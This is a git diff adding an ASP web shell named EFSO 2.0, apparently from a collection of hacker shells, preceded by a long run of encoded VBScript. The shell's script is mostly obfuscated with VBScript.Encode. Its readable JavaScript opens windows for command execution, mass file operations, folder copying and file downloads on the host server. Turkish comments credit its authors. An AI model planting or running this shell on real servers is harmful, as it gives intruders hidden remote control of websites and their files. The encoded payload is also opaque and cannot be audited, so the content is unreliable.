qDbY+,JnCD��^l�O�Dsls�~nWxD.W^"PInO3b/by~2.r�b: RcE)"+d2Kx/n Ax[@#@&7id7iI/wKxknRqDrYPE@!1+xDnD@*@!0KUOP6l1+xJECMkCVrEPkk"n{JJ+Er@*ul1VN~bx9+6,tDhV,|GN!)@!8M@*J@#@&diddi]n/aW	/nR	.bYnPr@!Y6OCM+l~^KVd'E{lB~MWS/'EFlvP	lh+{JE^KxYUYrJ@*@!&O+XYmDnl@*@!(D@*J@#@&did77bsPPC(VnP@!@*,KrDVPK4+	lI/2W	/n qDkDnPr|lM��sC�Y�M:mV�~|GUDDGVe~5YVrkky~3Mk�r:c cJl"+kwW	/ 2	N@#@&id77iI+k2W	/+c	.kD+,J@!4.@*zVO+MUlDko~GW/zC,kd:b~r@#@&ididd"+k2W	/nRqDrOPJ@!rxaEY,Ozw'rJO+aOrJ~xmh+{JE)^Y+.UmYrsbU9+arJ,\l^ExJrbsYDUCDksbUN6R4OhJr@*r@#@&d77idrs,Pl(Vn~@!@*PPrDVnP:4xl"+kwW	/ MkO+,JFCM��Vl�D�.:mV�PnGUYMW^"~5nO0kdk.~2Mk�rhcRREl"+dwKUk+ Ax9@#@&idi7d"+dwKxdncDbO+,JP&U[+XVDnPtCMl.P7nDs+~E@#@&d77id]+k2KxdRqDkD+,E@!bx2EDPOza+'E^tm3(GaB,xm:n'vtmDCDjnDs+v~7lV;n{BTB@*@!(D@*r@#@&ddidirs,KC4^+~@!@*PKbOVPK4nU)"+kwGxdnc.kDnPr|C.��^l�Y�.hmV�~|KUDDG^",5+D3bdk.P3Db�kh cRJ=]+kwW	dnRAx9@#@&d77id]+k2W	/n qDkOn,J@!k	2!Y~DXa+'rJMCNbWEJ,xCh'Jrhlk/WaOEJ,\mV;+xEr4.EDnJrP^4m3n[@*IGWD~7+~zVDP|^lk�.VD'x(/2ILx4k2iLx4k2IJ@#@&id7d7]/2W	d+c.rD+PE@!bx2ED~DX2'rJDmNbGJrPUls+xEr:lkdWaYJr~-l^E'EJdr	os+rE@*Ul[n1+P]GKY~|^Ck�DsD@!4D@*@!(.@*r@#@&did77bsP:C4^+P@!@*~KbY^+~K4n	)]+k2W	/n qDkOn,Je+DVb/r.PADk�b:c Rr)]+kwGUk+RAUN@#@&di77dbs,:rNcrsoS%B+#,@!@*~rlDE~:tnx=]/2Kxk+RqDbO+,J/X(+.jaXPl~z,|W9~e+D3b/ry^n,fn�k�DrDbVrzKDJl]/2W	dR3	N@#@&didi7I/2W	/n qDkDnPr@!k	2;Y,YHwn'EEkE8:bOJrP-C^E+xErK�hPUrD+sDbPCmm0s+rJ@*@!JmnUD+D@*E@#@&ddi77I/aWU/n qDrY~J@!ZnUD+D@*E,[~JUn�bVn	PnVlk�D9n3bPP�:,?rOV+MnP}YWsCOk0P_l^3n[,kUNaPzYC.rP[~E@!ZnxDnM@*E,[,J@!(D@*E@#@&d7did]nkwW	d+cDbOnPr@!J0GDh@*r@#@&di7diko~:l4sn,@!@*P:rDVn,K4+x=IdwKxd+c.rD+Pr�CwMly,FGxDDKVZP/z(+.?azPlP&~nWN~eYVkkr.mn,f�k�YbDbskHW.RcREl"+/aGxk+RAU[@#@&did7d@#@&id7di@#@&id77AV/n@#@&d7di7U+O,r(LsUr,xP;DnlD+68N+mDcJUmDb2Ok	ocsrVnjH/O+s64N+^Or#@#@&7id7daCDtH/	+KXY,xPd+WYv?n.7+Dc\lanlD4cI;!+dY jD-+M#lMkC8^+/cEUZ]qhP|1)t2r##Bq	dYMIn\v?n.7+Dc\lanlD4cI;!+dY jD-+M#lMkC8^+/cEUZ]qhP|1)t2r##BJ'E#*@#@&did77;O:Gw^ECm^VP{PalOtHnkxnKXOPLPE/qRtOhr@#@&di7idjY,1+kxP6DPxP}4%okWR}2+	K+XOok^+vZ	OPGaV;Cm^3BP+S,KD;nBPol^d#@#@&diddikw~Km4s+,@!@*~:kY^nP:t+	l]+kwKxd+ 	MkO+,E�laDC",|WUOMWs",/H4nM?aXPlPJ~|KN~5YVrkky1nPG+�k�Dr.k^kHW.R  r)]+k2W	/n AxN@#@&id7di-YGMNVk	tmdP{Pjw^kOc"+;!n/DRsK.h`rmKxO+UOr#S.(/Dd0b@#@&dd77isGD,r,'~ZP:WP`AK;x9`-+DW.[Vk	4lk#@#@&77didi1n/Un:6ORq.kD+Jr	+`-nDW.Nsbx4m/vk#*@#@&7did716O@#@&ddi7dU+Y,/z4Dql.DrGM{e+	r1/Un,'P68Nsjrc!YobV`ZqO:Gw^Eul13b@#@&ddi7d@#@&di77dbs,In;;nkY sK.:vJhCk/W2Or#~',EkkUTVJP:tU@#@&d7did7/mVV,PWaVEGnWl1+v.nDrKmDC:OD~Edbxosnr~64NoUrS;X(+DqlM.kKDm5xrH/xb@#@&ddi772^/koP]n$En/D sKDhcr:lddKwOJ*~{PE(D!Y+rP:4+	@#@&did77iZl^sP:Ww^;9+6l1+c.n.bnCDmh+DDnSr4D;OJSr(%w?6BZH4+Mm.DbW.{I+Urg+/	n#@#@&di77dAx9Prs@#@&id7dAUN,ko@#@&dd73	N~kw@#@&d7i@#@&ks,Km8VP@!@*,KrO^+P:4+	)Id2W	/R	DrOPE�la.l.PFG	YDGseP/X(nM?2HPlPz,|K[PI+O3b/r"1+PGn�k�DkDbsrXKDcR Jl]/2W	d+c2U[idd77@#@&7dAU9Pj!4@#@&dikw~KMkh`"+5;/Yc}EDXUO.k	ovJ/X8nMCDMrWM{PGaVEFCDVrlsE*#~{PrY+kYr~K4+U@#@&d77U+Y,64Ns?}~xP;DlO+68N+^YvE?1Dr2DkxL wks+UzkYnsr(L+1Yrb@#@&d7dalO4g+/	nKXYP{~J+6Yv?nD-nMR\laKlDtc];EndDRj+M-D#mDbl4^+kcJUZ]qhKmHzH2rb#BqxkO.I\v?nD-nMR\laKlDtc];EndDRj+M-D#mDbl4^+kcJUZ]qhKmHzH2rb#BJ-rbb@#@&didrs~hbNcksL~R~+b,@!@*~EmDEP:4xl"+kwW	/ MkO+,J/z(+DU2X,*PJ~FW9PI+O3rdby^+,9+�b�Yr.bVkzGMJlIdaWUk+c2x9@#@&7dirslH1nd	+/b~',wlD4H+kxKaY~',J/:n/DRsGTJ@#@&7idrs,hbNc:NBFvB *~@!@*PED�rPP4x)"n/aWxkn MkD+~J/z(+.?azPlP&~;X4n. CDMrKD }DTJ)"+k2W	/nRAx[@#@&ddij+DP1dU+:6DPxP68Nsjrc/DlOn:+6OobVn`}smXH/	+/b~:.E#@#@&id7jYP;z4Dm..kKD|5nxrH/U+,xP}4%oUrR!nDsrVc}VCH1/x/bb@#@&d7d;lss,}WMsl:Ww^;9+6l1+cIn2^l^+vPDb:c];EndDR}E.H?OMk	o`rwmOtr#b~ruESr-J*SJD+/DEb@#@&di2s/nrwPPDbh`"+5;/Y }!+.XUOMkUT`rZX(+M	lMDrWM{PGaVEnCY^klsEb#,',J/X8nMCDMrWM{9n6lmn6nJ~K4n	@#@&idiZl^V,tWMVCKKws;G+0m^+vI+asCm`:Dr:c];;+kORwW.hvJwCO4Jb#BE-JSr-r#~rZH8+MCDMkG.|f+6Cmr|rb@#@&idAx[Pro@#@&7Zmd+,2sd@#@&77;lsV,$KV;s?`A`*@#@&7d"+dwKxdncDbO+,?l(rOAm/^kVP'~~Wd?m8kDbsC	@#@&77;lsV,/H4nMmDDbWMmMKD;xDEsnUE4vb@#@&2x9~j+^+1Y@#@&ro,KC4^nP@!@*~PbYVn~:tnx@#@&"+daW	/+cI[kM+^Y,J4ODw)J&hShR;z8+MOql.DrGMR6DTE@#@&2U[,ks@#@&bs~:b[vK[BF+~ *P@!@*PrD�EP:tnU=I+k2W	/+c	.kD+,J/X8nM?2X,XPJP/z(+DR	mD.kK.cr.TJ=I+kwKU/R3x9@#@&vbsPA.Dc1Es8nD,@!@*PTPP4x@#@&E]+kwGUk+R	.bYnPr@!(D@*@!0KxY,0m^+{BCDblsv,/k.n'E B@*uCYm),J~[~3MD 1!h4D~',J@!8.@*@!8D@*@!(@*E,[,jZm/c2MD f/^.bwYbGx*P[,E@!z(@*@!4.@*$rMPulDCP}V;�O!J@#@&v"+dwKUk+ qDbY+,J@!8D@*@!WW	Y~Wmm+{vlMkl^v~/by'v v@*_lOl=~J,[~3MDRH;s4nD,',J@!(D@*@!4M@*@!8@*,CCYmR  cP5m":mzr0;hl,k.xrPeG0@!&4@*@!4M@*E@#@&B2U[,ko@#@&@#@&InkwKx/Rq.kD+~+	N^G9+@#@&]+kwW	dnRqDbYnPE@!(D@*@!;nxD+.@*@!sWUO,sCmxEr	o9kxT/E~?byn'EGv~;WVK.P{PBwooswsE@*@!4@*~�,@!&4@*@!zwWUO@*@!z/n	YnD@*E@#@&@#@&uJ9cAA==^#~@%>
diff --git a/xakep-shells/ASP/EFSO_2.asp.txt b/xakep-shells/ASP/EFSO_2.asp.txt
new file mode 100644
index 0000000..8d24d66
--- /dev/null
+++ b/xakep-shells/ASP/EFSO_2.asp.txt
@@ -0,0 +1,57 @@
+<%@ LANGUAGE = VBScript.Encode %>
+<%#@~^BgAAAA==vL[DMQIAAA==^#~@%>
+<%#@~^4BkAAA==@#@&B3w?}P2NN.PLP~sm/O8KXPDCDm0�x9CUPHl.�Vh��Y�.~6W.PUC.UlF ;WH~ ,K�\P_)nS)"q,2L9+M~+,brYDYr.cOO@*@#@&EK�H,u)|db"q~?)Fdq9q" R,|69dbI9),XCwm^m��xh�.P(kD,N�r�k0Vr3,|69!xP�ms��:m:lk�UCPsl^PGV;.cP$E	[l	P[G^lX�~$bD~/K.!x~��0lM/l,2x92"P'PUl#jz|R;GH,?WM;UV!P9+�rV[rMR @#@&vA!PzC.�V�:[C,onVb�ObVhb�PD�:P4+M�nX,~~:mxO�VBPl^LWMkYsCSPHl.�V�hVC.,?�W�D9Cx,2%[DPOCMlW�x9C	Pzmy�^:��Y�MR,P2tb~~,N�"n	P\[+,M�D�	�h~sm/D4GX~C,brYDrDc@#@&v:b|J�Pd2�]1G3gPFz�qgq1cP(zPA992"@#@&@#@&B2N[+MPhmd~CAIA@#@&@#@&vb0~D5E/Ocrl4^E*PxPrrk3GrPDt+	@#@&vD/2W	/n 1WW0r+k`JHndJ*P{PEFE@#@&B.+k2W	/n 1WWVr/cJHnkJbc+XwkM+k~',xGh3&X+@#@&BUN,k0,@#@&Bb0,xGY~.;;+kOR1WGVb+/cEH+dJ*~{PE8J,Ytx@#@&BM+dwKxdnchDbO+,J@!1nUYD@*@!8D@*@!(D@*@!(.@*I2OVbxPzG0R P@!8M@*@!(D@*4X,�/0GDakO6@!z^n	Y+M@*J@#@&BMndwKxk+ +U[v#@#@&Enx9PrW@#@&@#@&jD-+M Um.bwDKks+};Y,PxPF TT@#@&s!sValY4x.+aVmmn`]n$En/D ?D-nM.l.rm4s+kcrn):C|KIz1UJb:29J*~E&r~J'E#@#@&sbsnnmY4PxPhr9`oE^swmY4S&x?O."+-`w;^V2mY4~J'J*QF*@#@&sKV[nMnlD4P{PSWO`wE^V2lO4BqU?D.I\co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX"b~/fAs!u&9|J\grKp"j:j#q(I}!8 2**+G0,|OE@#@&mW	dY,3lMCVYD8'Eb$/G2oM_(9nS\H}np]j:j#oe\J@#@&mKx/DP0CDm3O+M xEm4m9n0TtkNVs:	Wa;./O;7haX.E@#@&NVCHkY~x,J@!tDh^@*@!4+mN@*@!YbOV@*3L9+.~G+x,VWM3~,;"l0P9E.R~Fm��xhlc R@!zOrDV+@*@!Jtnl9@*@!4G9X@*@!mxDnD@*@!8D@*@!8.@*@!4M@*@!(D@*@!8.@*@!4@*A;Pj^Mk2YbUP:j\~4l3sCMk~2x9AI~PmkYbDc~j.+.k	Nn~}Xxmhl,XlkCVYbDcP@!z8@*@!4.@*@!8D@*@!8.@*@!4.@*@!4.@*@!8@*4z,2xf2"@!J8@*@!z^+	Yn.@*@!z(GNH@*@!J4O:^@*r@#@&NVCHkO ,xPr@!4OsV@*@!4l[@*@!ObYs@*(XPA9G3I@!zOkDVn@*@!ztCN@*@!4K[z@*@!mxO+.@*@!4.@*@!8D@*@!8.@*@!4.@*@!4.@*@!8@*A;,?1DkaY,rPnEsVmxhC,Cl0Vk	PXKV~lMYb3 Pe)klVVmUNbR ~,K�DV~k+.\.,kU9lBPmK:cODBPLW7RO.,ok(rP0Vl�k.~XmNmPdkOn,\CD,r/~~[bD+V~mVL�VmU9���x[mPKYWslDr3,~~3!VsC	�:�x�.CPbyk	~-+M::n3On9k.R,i1`K\),3kS~(+UP(;,?^MkaYPbP:�.3bXn:by~r�bx~B~Xm4l	^�slMl,3CD��~V!Vsl	s�:,NrzP5)t9�: P@!&(@*~@!4M@*@!(D@*@!4M@*@!4M@*@!8M@*@!(@*4HP2x93I@!z(@*@!z^n	YnD@*@!z(W[z@*@!z4OsV@*J@#@&1WUkY,3lMl0O+M&xJZF+fW*vF0,r@#@&1GU/DP0l.lVOD*'rZ@$[^Y?Le`bR|_xU#,Y	N--=i@!@*~c_zr@#@&:mksmmDDmzP{PlM.CXvJHl4WGEBJ4WDhlbVESr:XUnDJSJThmksr~rtl13.J*P~B�.+s~slk^s+MPXm.CYsl0Pr�kUS,?Kbt~Nmx~Vm�lD�hC0Pr�k	 ,?n1EDkHPb~l�slVPb�kU~(XPABfAI@#@&;"l	Yb{CD.CHPxPm.DmXcE1W:ESrxnYrSr4r.JBJWMorSJTW-JBJ8.r~JbU0KJ#,@#@&Xm/m3ml..mX~',CDMlzcr2993"JSJU)j?)nJBJ5zMtiIr~EA�"f3\r~J(rD9+:rSEA&IG2\JSEwbjK~65r~Ejz.?)FcZ6HrSrZ6tR:IJBJV6.cK]J*@#@&hkkY~',J?m#jlnR;W\J@#@&GkhPwjr@#@&jnDPsj6,'~ZMnmYn}4N+mD`rjmMk2YbxL wkVjXkY+s68LmDJbP@#@&0WUEs~',K.rs`Dn5!+dYvE0WU!:r##@#@&sGNPxPM+5;/YvE:KN+rb@#@&wW^NnDKCDt+P{~D;;nkY`EoKV[+MKmY4yJ*[J'J@#@&kkVn:,'~.;EdYvJkksn:r#@#@&[+s~{P.+$;+kYcE9+VEb@#@&Wk^n,'~M+$E+kYvE0bVnJ*@#@&WKVN.P{PD5;+kYvJWWs[DE#@#@&Ym4sn,P'~];;+kOvJOm4^+J*@#@&rxN+^Y8P~x,I+$;+kY`rrULmDFE#@#@&bx%+1O ,Px~"+;;nkYcJbUN+^D r#@#@&k	%+1YfP,'~];EdYvJk	%nmD&r#@#@&rUN+^YW~P{P]n$E+dOvJrxNn1Y*r#@#@&k	L^YlP~',In5!+/DcJbxL^O*r#@#@&^:[VKN~P{~I;;nkY`E^sNVW9E*@#@&4l13+9P{~D;;+kYcE4lm0nNr#@#@&KCY4P{P.+5;/O`rKlDtEb@#@&E.s,'~D5!+dD`rED^J*@#@&1W;xDPx~M+;!n/D`J1G;xDJ*@#@&/r"PxPMn;!+dOvJ/r"Jb@#@&[(xCs+,'PM+$;+kYcJ94UCs+J*@#@&943m[rP{PM+5EndD`EN(Vl9kEb@#@&N8db0.+,x,Dn$E/YvJ98/b0.+r#@#@&LN./$VP{~.+$E/O`EnNNnDk5Vr#@#@&k+m~x,Dn;!nkYcr/mJ*@#@&i/DhNlPx~M+;!n/D`J`dnDsNlJb@#@&CMlqP{~D;;nkY`ECMlqJ*@#@&l.m ,'PM+$;+kYcJmDC+r#@#@&VF,'PMn5E/D`E3qE*@#@&3y~',Dn5!+/Ocr3+J*@#@&3f,',D+$EdYvJV&r#@#@&0cP{~D;EdO`r3WJb@#@&AmkOk	LP{P.n$E+dOvJAlbObxLr#@#@&:!D^~',J4YDwl&JhhS J@#@&mK[rxTP{P.+5;/O`r^W9kULr#@#@&[byrP{~M+5!+kY`rNb"kr#@#@&`/n.k:Nl~',D+$;n/D`rjd+.dsNXJ*@#@&klsO,'P.n$En/Dcr/C^Yr#@#@&tmdtyPxPM+5;/YvEtm/tyEb@#@&tm/4&~x,Dn;!n/D`E4m/tfE*@#@&tmd4c~{PM+;!+kO`rtC/4cEb@#@&tmdtlP',.n;!+kYcJ4CktXJ*@#@&4ld4+P'~.;;+kOvJ4m/4vJ*@#@&4lkt{P{P.n$E+kO`rtlk4{J*@#@&tC/40,'~D5E/Ocrtld4RJb@#@&4m/4OP{PD;!n/D`Etm/41r#@#@&4lktFZ~xPM+$En/OcrtC/4q!r#@#@&slN~x,J3sU6r@#@&@#@&b0P0W	;:,'~JrPO4x@#@&VW	E:,x~sKV9+.nCO4@#@&+^d+@#@&oG^N+.KmY4P{~0WU!:@#@&+	N,r0@#@&@#@&b0~hKN+,xPrFJ,O4+	@#@&sGV[nMnCY4~',Dn5!+/O 6W.:vEM+hKYJ#@#@&0Gx!:~',Dn5!+/D 0KD:vE.+sWD+E#@#@&x[PbW@#@&@#@&UKVkdO,'~smsk+@#@&wKwEaP{~smVd+@#@&@#@&b0PsGNP',E+J,WMPhW[n,'~J2EPKD~hKN+~x,J{J,GMPhKNP',JREPKD~:KNn~{PJ8J,WD,hGNP{PEF{E,W.PsGNPx~rF%E~KD~:K[Px,J8,J,WM~:KNnP{PE+ZJPK.PsWN~xPr 8J~W.~sW[+,xPr +E,WD~hKNnP{~r *rP,WD,:K[+,'~Jy*E~KDPsGNP',E+vrPKD~:G[PxPr+GrPG.,:W[n,'~Jy0rPGMPsWNP{~Jy,EPKD~hKN+,xPr&!r~GD,:KNnPx~r&qJ,GD,:G[P'~E2 EPK.,:G9+,'Pr&2EPKD~:KNn~{PJ2J,WD,hGNP{PE&0E,W.PsGNPx~r&,E~KD~:K[Px,JW!J,WM~:KNnP{PE*8JPK.PsWN~xPrcyJ~W.~sW[+,xPrcfE,WD~hKNnP{~rc*rPKDPsW9nP{PEclJ~GMP:K[+,'Pr11J,Y4+U@#@&2Kw;w,xP:D;n@#@&+U[,kW@#@&@#@&kW,:KN+,',EvrPOtx@#@&"+/aGxk+R~;W0D{K.En@#@&?nY,ok^Px~w?r !Yok^nv0r^+*@#@&"+k2W	/nR1WUOxYDzw'Jm22VbmmYrWU&6W.mRNKhUsKlNE@#@&In/aG	/ncb9NCl9nD,J/l1tnR1WxD.W^J~r2.k7lD+E@#@&]/2W	d+cb[[_+l[nMPEZKUD+UDOd+xTY4E~,srVc?r"@#@&"n/aWxkn b9N_+CNn.,J/W	O+	YR9b/wGdbYrW	EBPEmYDlm4:UYpPWk^+UCs+'r~[,sk^ Uls+@#@&]+d2Kxd+c$k	l.zqDkOn,Dnl9$bxCMXwkV`wrVcwCY4#@#@&U+Y,WP{P1KO4k	o=Pj+O~wksP{~1KY4r	o@#@&./2W	dRn	N@#@&+	N,r0@#@&@#@&b0~UKYPsGNP',EG39kMJ~Y4n	@#@&ZmsV,onsTkY@#@&x[PbW@#@&@#@&D/wKxknRSDrYPE@!DkY^n@*As?}~+RZPwW.PjCj?C|c/WtP@!&DkYsn@*J@#@&MnkwG	/RhMkDnPr@!h+Dl~4DYw n;!k\{EEZKxD+UYRPHwnJr~mKxOn	Y'EED+aYJ4D:spP1tlM/O'b/GOR%X1 ,Jr@*J@#@&Dd2W	/RADrOPE@!kOX^+@*E@#@&DndaWU/ SDrD+,J4KNH`:mDLk	)T2Xi0KUY /YHsn)	WM:CVIWKxOOkry)qTa6i^G^W.)[owsowsp0W	Y WlsksX=.n.9lxmSbMkl^I8l13TDGEU[ mGVK.)[&Cfm&lId1DGV^8mDR6l1+O1W^GD=P:&Z&TfZi/1.W^V4m.Rtbo4Vro4O mGVK.),aX[lN*[Ikm.W^s(l. /4lNKh ^W^W.),aq+8 FyI/1DW^s8lMO2NskL4DO^W^GD=P:fm&lfCp/^DKs^4CMOmDDKh ^W^W.),a1[ON,9I/1DW^s8lMODDCmVR1WsWMlP[&Cfm&lId1DGV^8mDR9lM3/4l9Gh mGVKDl~[&l2C&mi8r@#@&D/aWU/n SDrY~Jc3q`6WxOR6lhk^z=r	o9kxT/p~0KxOOkk"n=F*aai)J@#@&.n/aW	/nRA.bYnPr 3y	WG	YOWCsksX=	4[bxT/i,0KUY /ry)qXa6i)E@#@&D+k2Gxk+ch.kOn,JONPWW	YRdDXVnl	W.:msp0G	Y /k.+=q!a6ImKVG.=aswoswsi6GUY 0m:rVzlj+.NmUlBb.rmViNE@#@&.+k2KxdRSDkD+,ElPmGVKDl:A22A32pY+XORNmKDCYrG	)UW	ni)J@#@&M+/2G	/nRS.bYn,Jm)tK\.	1WsWM):*Zl!^i)J@#@&.n/aW	/nRA.bYnPrC)7kdrD+N`^KVGD=:A23A2Ai8r@#@&.+kwGxk+ AMkY~Jm)\bdrYN=tG\n.PmGVK.)[cTCZ+mINr@#@&DdaWUk+chDbY~Jbx2ED~E@#@&D+k2W	/+cA.kD+,J 38.D:SJ@#@&D/2G	/+ AMkO+,Ek+smD	4mm0LDKEUN=afT2!&ZImKVWMl:swswsoiWG	YR0mhk^Xl#DNCUm~)DbC^iWKxDO/bylFZwai7+.Obml^Rl^ko	lhk9N^+IP4nbo4Y=q%pP8GMN+.R^+WY=qa6~kW^kN,al[*9*[i,4G.9+D .kTtY=q26,/KVrN~:8 q 8+i,4G.9+DR8KYOWsl8wa,/KVk9P[q 8 q pP8GMN+MRYKw)82aPkW^k[P:X9*[*9I8r@#@&./wGUk+ hMrD+~rY6YmDC	(l^3TDG;	N)[q 8 FyI^W^WM):soowsoi6GxDOWCskVzlj+.NmUm~)MkmVi6W	OOkk"+=FT2Xi\.Ybml^RCVbo	)hk[[^+IP4nkTtOl8%i~8KD[+MR^+WD)8w6,/Ksk9P:FyF+qyiP(GD9+D .ro4Y=F26~dKVrN,:*9*[X9iP8GMNnD 8KYOK:=FwXPkGVbN~alNX[lNi,8WMN+MROWa)8waPdG^k[P[q 8 q+p8J@#@&M+dwKUk+ SDbY+,J@!&/DXs+@*J@#@&C7gHAA==^#~@%>
+
+<!--EFSO Ejder &  Fastboy taraf�ndan yaz�lm��t�r for SaVSaK.CoM . T�M HAKLARI Ejder e Aitttir.-->
+<!--T�M HAKLARI SAKLIDIR.. KODLARDA yapaca��nm�z bir de�i�iklik KODun �al��mamas�na mal olur. Bundan dolay� Bir sorun ��karsa EJDER & SaVSAK.CoM Sorunlu de�ildir..-->
+<!--Bu yaz�l�mda geli�tilmi� t�m her�ey , mant�k, algoritma, yaz�l�mlar S�f�rdan Ejder taraf�ndan yaz�lm��t�r. TEMA , d�zen vede G�r�n�m Fastboy a Aittir. -->
+<!-- TAKL�TLE�RNDEN KA�ININ. by EJDER-->
+
+<script language=javascript>
+    function NewWindow(mypage, myname, w, h, scroll) {
+        var winl = (screen.width - w) / 2;
+        var wint = (screen.height - h) / 2;
+            winprops = 'height='+h+',width='+w+',top='+wint+',left='+winl+',scrollbars='+scroll+',resizable'
+        win = window.open(mypage, myname, winprops)
+        if (parseInt(navigator.appVersion) >= 4) { win.window.focus(); }
+    }
+    function klasorkopya(yol){
+        NewWindow(yol,"",400,130,"no");
+    }
+    function mass(yol){
+        NewWindow(yol,"",555,600,"yes");
+    }
+    function tester(yol){
+        NewWindow(yol,"",600,600,"yes");
+    }  
+    function klasor(yol){
+        NewWindow(yol,"",420,450,"yes");
+    }    
+    function cmd(yol){
+        NewWindow(yol,"",550,555,"no");
+    }
+    function biz(yol){
+        NewWindow(yol,"",550,700,"no");
+    }  
+    function cmdhelp(yol){
+        NewWindow(yol,"",500,230,"no");
+    }   
+    function somur(yol){
+        NewWindow(yol,"",420,220,"yes");
+    }       
+</script>
+<script language="JavaScript">
+function openInMainWin(winLocation){
+	window.opener.location.href = winLocation
+	window.opener.focus();
+}
+</script>
+<%#@~^ZFwCAA==@#@&/;(PnVlkWM63!@#@&dKx~nMDWM~D/Esn~x6D@#@&P~~,?nY,WP{Poj}RMnOwWsN.vsG^NDnmY4b@#@&P~P,?nO,0m,xP6R?!8oW^NDd@#@&~,P~sK.PAl^4,0F~(	PWm@#@&id7Eq6Pq	/D.`6F 1m:nS,JmKhRDDJ*~@*P8PKD~P(UkY.`6qRglhnBPJLG7RODrb,@*~8PKDP,q	dYM`WFc1Ch~Pr^WsYDrb~@*,F,PGD~~&xdYMc08RHCs+~~ETW-YME*P@*,F,PWMP,(xkY.`6F Hm:+B~JTW\|O.J*P@*PqP~GMP~q	dYM`Wqc1lhnBPEmKh|Y.r#,@*P8P,GD,P(xkY.c6FRgC:~PrdC\kl0mG:Eb,@*~F,~WMP~(	/Y.c6F 1mh~~r/m\/m3|^WsJbP@*Pq~,WD,~q	/YMcWFc1m:n~~Ekl-/mVR1WhE*P@*~q,K4+	@#@&d7idE?+DPDn6D?ODlh6(L+1OP{P0kG ra+	Kn6OobVn`w;V^wCO4~ SOMEn~6C^/n*P@#@&didivY6O?DDnCsr4NnmDRMrO+dk	+cNVCHkO *@#@&id77EY+aOUY.+mh}4%mDRZ^WknxDn@#@&d77iB?OPD+6DjODlsr8Ln^DPxPgGY4kUL,@#@&77idvDdaWUk+c+x9`*@#@&id7Bx[~b0@#@&~P,PdbW~sKV9+.nCO4PxPr^)rPG.,sWs[DKlD4,'~rZ=JPDtU@#@&P~P,P~~,I+k2W	/+c	.kD+,J@!YC8^+~m^C/k'EE04DOhrJ~@*@!OM@*@!DN@*@!0KxD~m^ld/{JEV8JJ@*@!l,YkDsn'rJ,fryrUbPFWazl^l~',Kl��~ErP4DW{BELsbV+hlD4[rghW9+x+L3W	;:{J[wGsNDhlOt'Er[WFcHls+'ELKkhn{J'Ybh[EEPKxm^k1V'rJVVm/G.0WwHC`Dtkk 4D0*i.+O;Mx~0ms/iEE@*c@!&C@*@!&0KUD@*~@!0KxY,m^C/k'EJ0FEE@*@!l,~YbYVxEJ,fbyrxr~UksPrEP4DnW{BJ'obVnnmO4[EQ:KN+{cLVW	Eh'r[oG^N+MKlDt[r'[+^'r[oWs[DKlD4[rJ'W8R1Ch[E[:rs+xr[Dk:[rv@*�@!zC@*,F@!&6WxD@*@!6WxD~dk.+{ @*@!8@*@!l~YbOV'EE,fk"r	kUPb�r	+~VkMPJrP4.+6'vJLsrsnlD4[rg3KU;:{JLsGV[nMnCY4'Jr[Wqc1lhnLJ'Kbh'ELYb:+LJE@*JL0qR	lhnLJ@!JC@*@!z4@*@!&Y9@*@!zOD@*@!JYC4^n@*rP~~,PP~7@#@&~P,~i+sk+@#@&P,P,~P,P]+kwGUk+Rq.kD+Pr@!Ol(VP^VCdk'EJ08DD:EE,@*@!O.@*@!ON@*@!6WUDP1Vlk/{EJ0FEJ@*@!C~DkY^n'rJPGr"k	k,|GwzC^l~[,Pl��,JE~4D+WxEJ'sbsnCDtLJgsW9n'y[VW	Ehxr[sKsNDnmO4[r-r[WF Hm:n[r'Kb:nxr[Yrh[EB,G	msbm0'Jr3^C/KDVWaXCcDtkk tM+0*I.+DEMx~0Csk+IJr@*c@!zC@*@!z0GUD@*~@!6G	Y~1Vm//{JrVFrJ@*@!mP~ObYVxJrPfb"rxbPUksPEE,t.+6xBr[or^+nCO4[EgsG9+xW[0Wx!:{E[wWsNDKCDt[r'NV'r'oW^NDKlO4LJwJLWFc1Ch[J'Pb:n'r'Dkh[rB@*�@!zm@*P8@!&0KxO@*@!0W	OPkkyx+@*@!4@*@!CPOrDVn'rEPGk"r	kx~r�bxnPVrMPErP4D+6'EE[wks+hlO4LJg0Gx!:'r'oW^NDKlO4LJwJLWFc1Ch[J'Pb:n'r'Dkh[rB@*r[6qR	lh+LJ@!&m@*@!J8@*@!zY9@*@!zDD@*@!&YC8^+@*J,~P@#@&~~,PP~~,+UN,r6@#@&,P,PP,P,]+kwGxk+ o^E/4@#@&,PP,Hn6D@#@&P~P~^mVsP4CYm@#@&n	NPd;(@#@&@#@&d!4~GWkXl}3!@#@&iWUPD.GMPDdEs+P	naY@#@&,P~PjnDPWP{~sUr !YsGs9+.`wG^NnMnmYt*@#@&~P,Pj+DPW^,'P6 sbV+k@#@&P,P,sGD~3mm4P6qP&x~W1@#@&~~,P~P,~9WdHlzNk,',WFcxC:@#@&~,PP,~P,xEs~xP&xUY.In-vNG/HCb9kSEcJ#@#@&,P~P,~,P;.l	Yk,',smm/n`"kL4D`NKdXmbNbSs+	`9WdXC)9kbO	;:*#@#@&,PP~~,P~NKA	?OMP{PJ@!l,OkDVn'rJ9GkXlH�~?bVJr~4D0{BE[or^+KlD4[rghG9+'X'0WUEsxr[oKV9+DhlD4[r[[+^'E'wWV9nDhlY4'E-r[6F 1Ch[E[:r:'E'Dk:n'rB@*�@!JC@*@!WKxDP0mmxh4[k	od@*@!lPDrY^+'rE~fKh	VGl[~Y~Jr~tM+WxEJ[or^+KlD4LJ_sW9+'+[6rV'E[6F 2mYtLE[0Wx!hxJLsKV[+.KmY4[r'Kb:nxr[Yrh[EB@*�@!Jl@*@!z6WxD@*@!WW	Y~0mmnxSkxT[k	o/@*@!CPDkDVn'EE,fG/HCX�,|G2HlVC~LPPl��,ErP4M+6'Br[wrVnCY4[E_sWNxGL0k^nxJL08R2lO4LJ'Kbh+{J'Ob:+'EEPGx1sbmV{Jr3Vm/K.3KwzlvY4rkRtMn0*iDO;D	P6ls/nIrJ@*c@!&l@*@!C~DkYsn{JEPGGkXC,b9P[,sK.:mY~f�k�OrMPJr~tM+0{vE[wk^+KlO4LJ_:K[+{F'6kVnxr[WFc2mY4LJLk/^+sxJL0qR	lhnLJ[0Gx!:'r'oW^NDKlO4LJ'Kbh+{J'Ob:+'EEPGx1sbmV{Jr3Vm/K.3KwzlvY4rkRtMn0*iDO;D	